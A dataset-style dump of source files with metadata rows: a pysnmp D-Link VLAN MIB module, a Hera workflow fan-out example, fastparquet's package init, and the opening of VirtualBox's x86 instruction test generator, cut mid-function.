swMacBaseVlanAddrMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddrMaxNum.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrMaxNum.setDescription('The maximum number of entries in Mac-based Vlan address table.')
swMacBaseVlanCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2), )
if mibBuilder.loadTexts: swMacBaseVlanCtrlTable.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlTable.setDescription('A table that contains information about MAC base Vlan entries for which the switch has forwarding and/or filtering information. This information is used by the transparent switching function in determining how to propagate a received frame.')
swMacBaseVlanCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swMacBaseVlanDesc"))
if mibBuilder.loadTexts: swMacBaseVlanCtrlEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlEntry.setDescription('A list of information about a specific MAC base Vlan configuration portlist for which the switch has some forwarding and/or filtering information.')
swMacBaseVlanDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanDesc.setDescription('A textual description of the Mac Base Vlan for memorization. The string cannot set to empty string. There is a default value for this string.')
swMacBaseVlanMacMember = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanMacMember.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanMacMember.setDescription('This object indicates the total number of MAC addresses contained in the VLAN entry.')
swMacBaseVlanCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanCtrlState.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanCtrlState.setDescription('This object indicates the MacBase Vlan state.')
swMacBaseVlanAddrTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3), )
if mibBuilder.loadTexts: swMacBaseVlanAddrTable.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrTable.setDescription('A table that contains information about unicast or multicast entries for which the switch has forwarding and/or filtering information. This information is used by the transparent switching function in determining how to propagate a received frame. Note that the priority of MacBaseVlanAddr table entries is lowest than Filtering Table and FDB Table, i.e. if there is a table hash collision between the entries of MacBaseVlanAddr Table and Filtering Table inside the switch H/W address table, then Filtering Table entry overwrite the colliding entry of MacBaseVlanAddr Table. This state is same of FDB table. See swFdbFilterTable and swFdbStaticTable description also.')
swMacBaseVlanAddrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swMacBaseVlanAddr"))
if mibBuilder.loadTexts: swMacBaseVlanAddrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrEntry.setDescription('A list of information about a specific unicast or multicast MAC address for which the switch has some forwarding and/or filtering information.')
swMacBaseVlanAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddr.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddr.setDescription('This object indictaes a unicast or multicast MAC address for which the bridge has forwarding and/or filtering information.')
swMacBaseVlanAddrVlanDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanAddrVlanDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrVlanDesc.setDescription('A textual description of the Mac Base Vlan for memorization.')
swMacBaseVlanAddrState = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("invalid", 2), ("valid", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swMacBaseVlanAddrState.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrState.setDescription('This object indicates the MacBase Vlan Address entry state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. invalid(2) - writing this value to the object, and then the corresponding entry will be removed from the table. valid(3) - this entry is reside in the table.')
swMacBaseVlanAddrStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 2, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("apply", 2), ("not-apply", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swMacBaseVlanAddrStatus.setStatus('mandatory')
if mibBuilder.loadTexts: swMacBaseVlanAddrStatus.setDescription('This object indicates the MacBase Vlan Address entry state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. apply(2) - this entry is currently in use and reside in the table. not-apply(3) - this entry is reside in the table but currently not in use due to conflict with filter table.')
swPortBaseVlanTotalNum = MibScalar((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanTotalNum.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanTotalNum.setDescription('The total number of Port-Base Vlan which is in enabled state within this switch hub.')
swPortBaseVlanDefaultVlanTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2), )
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanTable.setDescription('A table that contains default Port-Based VLAN list entries for the switch. The entry (Vid = 1,i.e. swPortBaseVlanDefaultPvid = 1) is defalut Port-Based VLAN , maintained by system.')
swPortBaseVlanDefaultVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swPortBaseVlanDefaultPvid"))
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultVlanEntry.setDescription('A list of default Port-Based VLAN information in swPortBaseVlanDefaultVlanTable.')
swPortBaseVlanDefaultPvid = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPvid.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPvid.setDescription('This object indicates the default Port-Base Vlan ID. It occupies only 1 entry in VLAN table, with VID=1.')
swPortBaseVlanDefaultDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultDesc.setDescription('A textual description of the Port-Base Vlan.')
swPortBaseVlanDefaultPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 3), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortList.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortList.setDescription('This object indicates the port member set of the specified Vlan. Each Vlan has a octect string to indicate the port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port.')
swPortBaseVlanDefaultPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 2, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortNumber.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanDefaultPortNumber.setDescription('This object indicates the number of ports of the entry.')
swPortBaseVlanConfigTable = MibTable((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3), )
if mibBuilder.loadTexts: swPortBaseVlanConfigTable.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigTable.setDescription("A table that contains Port-Based VLAN list entries for the switch. The device can't support port overlapping in Port-Based VLAN.")
swPortBaseVlanConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1), ).setIndexNames((0, "SW-VLAN-MIB", "swPortBaseVlanConfigPvid"))
if mibBuilder.loadTexts: swPortBaseVlanConfigEntry.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigEntry.setDescription('A list of information about a specific Port-Based VLAN configuration in swPortBaseVlanConfigTable.')
swPortBaseVlanConfigPvid = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 12))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanConfigPvid.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPvid.setDescription('This object indicates the Port-Base Vlan ID. There are up to 11 entries for current product now. The object range varies from 2 to 12.')
swPortBaseVlanConfigDesc = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 12))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swPortBaseVlanConfigDesc.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigDesc.setDescription('A textual description of the Port-Base Vlan. It cannot be a null string. And each description must be unique in the table.')
swPortBaseVlanConfigPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 3), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swPortBaseVlanConfigPortList.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPortList.setDescription('This object indicates which ports are belong to the Vlan. Each Vlan has a octect string to indicate with port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port.')
swPortBaseVlanConfigPortNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 2, 20, 1, 2, 2, 2, 28, 2, 8, 3, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swPortBaseVlanConfigPortNumber.setStatus('mandatory')
if mibBuilder.loadTexts: swPortBaseVlanConfigPortNumber.setDescription('This object indicates the number of ports of the entry.')
mibBuilder.exportSymbols("SW-VLAN-MIB", marconi=marconi, swPortBaseVlanDefaultVlanEntry=swPortBaseVlanDefaultVlanEntry, swVlan=swVlan, swPortBaseVlanConfigTable=swPortBaseVlanConfigTable, golf=golf, swVlanCtrl=swVlanCtrl, swMacBaseVlanAddrEntry=swMacBaseVlanAddrEntry, swPortBaseVlanDefaultDesc=swPortBaseVlanDefaultDesc, swMacBaseVlanAddr=swMacBaseVlanAddr, swMacBaseVlanMacMember=swMacBaseVlanMacMember, swPortBaseVlanConfigPortNumber=swPortBaseVlanConfigPortNumber, swPortBaseVlanDefaultVlanTable=swPortBaseVlanDefaultVlanTable, swPortBaseVlan=swPortBaseVlan, swMacBaseVlanAddrMaxNum=swMacBaseVlanAddrMaxNum, swL2Mgmt=swL2Mgmt, dlinkcommon=dlinkcommon, swPortBaseVlanConfigEntry=swPortBaseVlanConfigEntry, swPortBaseVlanConfigPortList=swPortBaseVlanConfigPortList, swVlanSnmpPortVlan=swVlanSnmpPortVlan, swMacBaseVlanCtrlState=swMacBaseVlanCtrlState, PortList=PortList, external=external, swMacBaseVlanAddrStatus=swMacBaseVlanAddrStatus, swPortBaseVlanTotalNum=swPortBaseVlanTotalNum, swMacBaseVlan=swMacBaseVlan, swVlanInfoStatus=swVlanInfoStatus, swMacBaseVlanDesc=swMacBaseVlanDesc, swPortBaseVlanDefaultPvid=swPortBaseVlanDefaultPvid, dlink=dlink, MacAddress=MacAddress, swVlanCtrlMode=swVlanCtrlMode, golfproducts=golfproducts, systems=systems, swMacBaseVlanCtrlTable=swMacBaseVlanCtrlTable, swMacBaseVlanAddrVlanDesc=swMacBaseVlanAddrVlanDesc, marconi_mgmt=marconi_mgmt, swMacBaseVlanMaxNum=swMacBaseVlanMaxNum, swMacBaseVlanCtrlEntry=swMacBaseVlanCtrlEntry, swPortBaseVlanDefaultPortList=swPortBaseVlanDefaultPortList, swMacBaseVlanAddrTable=swMacBaseVlanAddrTable, swPortBaseVlanConfigPvid=swPortBaseVlanConfigPvid, swPortBaseVlanConfigDesc=swPortBaseVlanConfigDesc, VlanIndex=VlanIndex, swPortBaseVlanDefaultPortNumber=swPortBaseVlanDefaultPortNumber, golfcommon=golfcommon, swMacBaseVlanAddrState=swMacBaseVlanAddrState, es2000Mgmt=es2000Mgmt, es2000=es2000, swMacBaseVlanInfo=swMacBaseVlanInfo)
| 143.507692
| 1,908
| 0.767206
| 340
| 0.018225
| 0
| 0
| 0
| 0
| 0
| 0
| 6,241
| 0.33453
|
3696c582aaf438a2c947387898295abd07a07bfe
| 1,007
|
py
|
Python
|
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
examples/artifact_with_fanout.py
|
bchalk101/hera-workflows
|
a3e9262f996ba477a35850c7e4b18ce3d5749687
|
[
"MIT"
] | null | null | null |
from hera import (
InputArtifact,
InputFrom,
OutputArtifact,
Task,
Workflow,
WorkflowService,
)
def writer():
import json
with open('/file', 'w+') as f:
for i in range(10):
f.write(f'{json.dumps(i)}\n')
def fanout():
import json
import sys
indices = []
with open('/file', 'r') as f:
for line in f.readlines():
indices.append({'i': line})
json.dump(indices, sys.stdout)
def consumer(i: int):
print(i)
ws = WorkflowService(host='https://my-argo-server.com', token='my-auth-token')
w = Workflow('artifact-with-fanout', ws)
w_t = Task('writer', writer, output_artifacts=[OutputArtifact(name='test', path='/file')])
f_t = Task(
'fanout',
fanout,
input_artifacts=[InputArtifact(from_task='writer', artifact_name='test', name='test', path='/file')],
)
c_t = Task('consumer', consumer, input_from=InputFrom(name='fanout', parameters=['i']))
w_t >> f_t >> c_t
w.add_tasks(w_t, f_t, c_t)
w.create()
| 21.891304
| 105
| 0.61569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 186
| 0.184707
|
3696d9a0ae665b8ea6b0dd59b9953426ce1a1124
| 424
|
py
|
Python
|
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
fastparquet/__init__.py
|
jorisvandenbossche/fastparquet
|
e783eca9499883a6f025f18cce709c226e21402f
|
[
"Apache-2.0"
] | null | null | null |
"""parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
__version__ = "0.3.2"
| 28.266667
| 48
| 0.823113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.099057
|
36979d30250b5ace4c5161cd349e582790c807b4
| 96,838
|
py
|
Python
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 521
|
2019-03-29T15:44:08.000Z
|
2022-03-22T09:46:19.000Z
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 30
|
2019-06-04T17:00:49.000Z
|
2021-09-08T20:44:19.000Z
|
third_party/virtualbox/src/VBox/VMM/testcase/Instructions/InstructionTestGen.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 99
|
2019-03-29T16:04:13.000Z
|
2022-03-28T16:59:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: InstructionTestGen.py $
"""
Instruction Test Generator.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
"""
__version__ = "$Revision: 118412 $";
# pylint: disable=C0103,R0913
# Standard python imports.
import io;
import os;
from optparse import OptionParser
import random;
import sys;
## @name Exit codes
## @{
RTEXITCODE_SUCCESS = 0;
RTEXITCODE_SYNTAX = 2;
## @}
## @name Various C macros we're used to.
## @{
UINT8_MAX = 0xff
UINT16_MAX = 0xffff
UINT32_MAX = 0xffffffff
UINT64_MAX = 0xffffffffffffffff
def RT_BIT_32(iBit): # pylint: disable=C0103
""" 32-bit one bit mask. """
return 1 << iBit;
def RT_BIT_64(iBit): # pylint: disable=C0103
""" 64-bit one bit mask. """
return 1 << iBit;
## @}
## @name ModR/M
## @{
X86_MODRM_RM_MASK = 0x07;
X86_MODRM_REG_MASK = 0x38;
X86_MODRM_REG_SMASK = 0x07;
X86_MODRM_REG_SHIFT = 3;
X86_MODRM_MOD_MASK = 0xc0;
X86_MODRM_MOD_SMASK = 0x03;
X86_MODRM_MOD_SHIFT = 6;
## @}
## @name SIB
## @{
X86_SIB_BASE_MASK = 0x07;
X86_SIB_INDEX_MASK = 0x38;
X86_SIB_INDEX_SMASK = 0x07;
X86_SIB_INDEX_SHIFT = 3;
X86_SIB_SCALE_MASK = 0xc0;
X86_SIB_SCALE_SMASK = 0x03;
X86_SIB_SCALE_SHIFT = 6;
## @}
## @name Prefixes
## @
X86_OP_PRF_CS = 0x2e;
X86_OP_PRF_SS = 0x36;
X86_OP_PRF_DS = 0x3e;
X86_OP_PRF_ES = 0x26;
X86_OP_PRF_FS = 0x64;
X86_OP_PRF_GS = 0x65;
X86_OP_PRF_SIZE_OP = 0x66;
X86_OP_PRF_SIZE_ADDR = 0x67;
X86_OP_PRF_LOCK = 0xf0;
X86_OP_PRF_REPNZ = 0xf2;
X86_OP_PRF_REPZ = 0xf3;
X86_OP_REX_B = 0x41;
X86_OP_REX_X = 0x42;
X86_OP_REX_R = 0x44;
X86_OP_REX_W = 0x48;
## @}
## @name General registers
## @
X86_GREG_xAX = 0
X86_GREG_xCX = 1
X86_GREG_xDX = 2
X86_GREG_xBX = 3
X86_GREG_xSP = 4
X86_GREG_xBP = 5
X86_GREG_xSI = 6
X86_GREG_xDI = 7
X86_GREG_x8 = 8
X86_GREG_x9 = 9
X86_GREG_x10 = 10
X86_GREG_x11 = 11
X86_GREG_x12 = 12
X86_GREG_x13 = 13
X86_GREG_x14 = 14
X86_GREG_x15 = 15
## @}
## @name Register names.
## @{
g_asGRegs64NoSp = ('rax', 'rcx', 'rdx', 'rbx', None, 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs64 = ('rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15');
g_asGRegs32NoSp = ('eax', 'ecx', 'edx', 'ebx', None, 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs32 = ('eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi',
'r8d', 'r9d', 'r10d', 'r11d', 'r12d', 'r13d', 'r14d', 'r15d');
g_asGRegs16NoSp = ('ax', 'cx', 'dx', 'bx', None, 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs16 = ('ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di',
'r8w', 'r9w', 'r10w', 'r11w', 'r12w', 'r13w', 'r14w', 'r15w');
g_asGRegs8 = ('al', 'cl', 'dl', 'bl', 'ah', 'ch', 'dh', 'bh');
g_asGRegs8Rex = ('al', 'cl', 'dl', 'bl', 'spl', 'bpl', 'sil', 'dil',
'r8b', 'r9b', 'r10b', 'r11b', 'r12b', 'r13b', 'r14b', 'r15b',
'ah', 'ch', 'dh', 'bh');
## @}
## @name EFLAGS/RFLAGS/EFLAGS
## @{
X86_EFL_CF = RT_BIT_32(0);
X86_EFL_CF_BIT = 0;
X86_EFL_1 = RT_BIT_32(1);
X86_EFL_PF = RT_BIT_32(2);
X86_EFL_AF = RT_BIT_32(4);
X86_EFL_AF_BIT = 4;
X86_EFL_ZF = RT_BIT_32(6);
X86_EFL_ZF_BIT = 6;
X86_EFL_SF = RT_BIT_32(7);
X86_EFL_SF_BIT = 7;
X86_EFL_TF = RT_BIT_32(8);
X86_EFL_IF = RT_BIT_32(9);
X86_EFL_DF = RT_BIT_32(10);
X86_EFL_OF = RT_BIT_32(11);
X86_EFL_OF_BIT = 11;
X86_EFL_IOPL = (RT_BIT_32(12) | RT_BIT_32(13));
X86_EFL_NT = RT_BIT_32(14);
X86_EFL_RF = RT_BIT_32(16);
X86_EFL_VM = RT_BIT_32(17);
X86_EFL_AC = RT_BIT_32(18);
X86_EFL_VIF = RT_BIT_32(19);
X86_EFL_VIP = RT_BIT_32(20);
X86_EFL_ID = RT_BIT_32(21);
X86_EFL_LIVE_MASK = 0x003f7fd5;
X86_EFL_RA1_MASK = RT_BIT_32(1);
X86_EFL_IOPL_SHIFT = 12;
X86_EFL_STATUS_BITS = ( X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_ZF | X86_EFL_SF | X86_EFL_OF );
## @}
## @name Random
## @{
g_iMyRandSeed = int((os.urandom(4)).encode('hex'), 16);
#g_iMyRandSeed = 286523426;
#g_iMyRandSeed = 1994382324;
g_oMyRand = random.Random(g_iMyRandSeed);
#g_oMyRand = random.SystemRandom();
def randU8():
""" Unsigned 8-bit random number. """
return g_oMyRand.getrandbits(8);
def randU16():
""" Unsigned 16-bit random number. """
return g_oMyRand.getrandbits(16);
def randU32():
""" Unsigned 32-bit random number. """
return g_oMyRand.getrandbits(32);
def randU64():
""" Unsigned 64-bit random number. """
return g_oMyRand.getrandbits(64);
def randUxx(cBits):
""" Unsigned 8-, 16-, 32-, or 64-bit random number. """
return g_oMyRand.getrandbits(cBits);
def randSxx(cBits):
""" Signed 8-, 16-, 32-, or 64-bit random number. """
uVal = randUxx(cBits);
iRet = uVal & ((1 << (cBits - 1)) - 1);
if iRet != uVal:
iRet = -iRet;
return iRet;
def randUxxList(cBits, cElements):
""" List of unsigned 8-, 16-, 32-, or 64-bit random numbers. """
return [randUxx(cBits) for _ in range(cElements)];
## @}
## @name Instruction Emitter Helpers
## @{
def calcRexPrefixForTwoModRmRegs(iReg, iRm, bOtherRexPrefixes = 0):
"""
Calculates a rex prefix if neccessary given the two registers
and optional rex size prefixes.
Returns an empty array if not necessary.
"""
bRex = bOtherRexPrefixes;
if iReg >= 8:
bRex |= X86_OP_REX_R;
if iRm >= 8:
bRex |= X86_OP_REX_B;
if bRex == 0:
return [];
return [bRex,];
def calcModRmForTwoRegs(iReg, iRm):
"""
Calculate the RM byte for two registers.
Returns an array with one byte in it.
"""
bRm = (0x3 << X86_MODRM_MOD_SHIFT) \
| ((iReg << X86_MODRM_REG_SHIFT) & X86_MODRM_REG_MASK) \
| (iRm & X86_MODRM_RM_MASK);
return [bRm,];
## @}
## @name Misc
## @{
def convU32ToSigned(u32):
""" Converts a 32-bit unsigned value to 32-bit signed. """
if u32 < 0x80000000:
return u32;
return u32 - UINT32_MAX - 1;
def rotateLeftUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the left. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal << cShift) & uMask;
uRet |= (uVal >> (cBits - cShift));
return uRet;
def rotateRightUxx(cBits, uVal, cShift):
""" Rotate a xx-bit wide unsigned number to the right. """
assert cShift < cBits;
if cBits == 16:
uMask = UINT16_MAX;
elif cBits == 32:
uMask = UINT32_MAX;
elif cBits == 64:
uMask = UINT64_MAX;
else:
assert cBits == 8;
uMask = UINT8_MAX;
uVal &= uMask;
uRet = (uVal >> cShift);
uRet |= (uVal << (cBits - cShift)) & uMask;
return uRet;
def gregName(iReg, cBits, fRexByteRegs = True):
""" Gets the name of a general register by index and width. """
if cBits == 64:
return g_asGRegs64[iReg];
if cBits == 32:
return g_asGRegs32[iReg];
if cBits == 16:
return g_asGRegs16[iReg];
assert cBits == 8;
if fRexByteRegs:
return g_asGRegs8Rex[iReg];
return g_asGRegs8[iReg];
## @}
class TargetEnv(object):
"""
Target Runtime Environment.
"""
## @name CPU Modes
## @{
ksCpuMode_Real = 'real';
ksCpuMode_Protect = 'prot';
ksCpuMode_Paged = 'paged';
ksCpuMode_Long = 'long';
ksCpuMode_V86 = 'v86';
## @}
## @name Instruction set.
## @{
ksInstrSet_16 = '16';
ksInstrSet_32 = '32';
ksInstrSet_64 = '64';
## @}
def __init__(self, sName,
sInstrSet = ksInstrSet_32,
sCpuMode = ksCpuMode_Paged,
iRing = 3,
):
self.sName = sName;
self.sInstrSet = sInstrSet;
self.sCpuMode = sCpuMode;
self.iRing = iRing;
self.asGRegs = g_asGRegs64 if self.is64Bit() else g_asGRegs32;
self.asGRegsNoSp = g_asGRegs64NoSp if self.is64Bit() else g_asGRegs32NoSp;
def isUsingIprt(self):
""" Whether it's an IPRT environment or not. """
return self.sName.startswith('iprt');
def is64Bit(self):
""" Whether it's a 64-bit environment or not. """
return self.sInstrSet == self.ksInstrSet_64;
def getDefOpBits(self):
""" Get the default operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
return 32;
def getDefOpBytes(self):
""" Get the default operand size as a byte count. """
return self.getDefOpBits() / 8;
def getMaxOpBits(self):
""" Get the max operand size as a bit count. """
if self.sInstrSet == self.ksInstrSet_64:
return 64;
return 32;
def getMaxOpBytes(self):
""" Get the max operand size as a byte count. """
return self.getMaxOpBits() / 8;
def getDefAddrBits(self):
""" Get the default address size as a bit count. """
if self.sInstrSet == self.ksInstrSet_16:
return 16;
if self.sInstrSet == self.ksInstrSet_32:
return 32;
return 64;
def getDefAddrBytes(self):
""" Get the default address size as a byte count. """
return self.getDefAddrBits() / 8;
def getGRegCount(self, cbEffBytes = 4):
""" Get the number of general registers. """
if self.sInstrSet == self.ksInstrSet_64:
if cbEffBytes == 1:
return 16 + 4;
return 16;
return 8;
def randGRegNoSp(self, cbEffBytes = 4):
""" Returns a random general register number, excluding the SP register. """
iReg = randU16() % self.getGRegCount(cbEffBytes);
while iReg == X86_GREG_xSP:
iReg = randU16() % self.getGRegCount(cbEffBytes);
return iReg;
def randGRegNoSpList(self, cItems, cbEffBytes = 4):
""" List of randGRegNoSp values. """
aiRegs = [];
for _ in range(cItems):
aiRegs.append(self.randGRegNoSp(cbEffBytes));
return aiRegs;
def getAddrModes(self):
""" Gets a list of addressing mode (16, 32, or/and 64). """
if self.sInstrSet == self.ksInstrSet_16:
return [16, 32];
if self.sInstrSet == self.ksInstrSet_32:
return [32, 16];
return [64, 32];
def is8BitHighGReg(self, cbEffOp, iGReg):
""" Checks if the given register is a high 8-bit general register (AH, CH, DH or BH). """
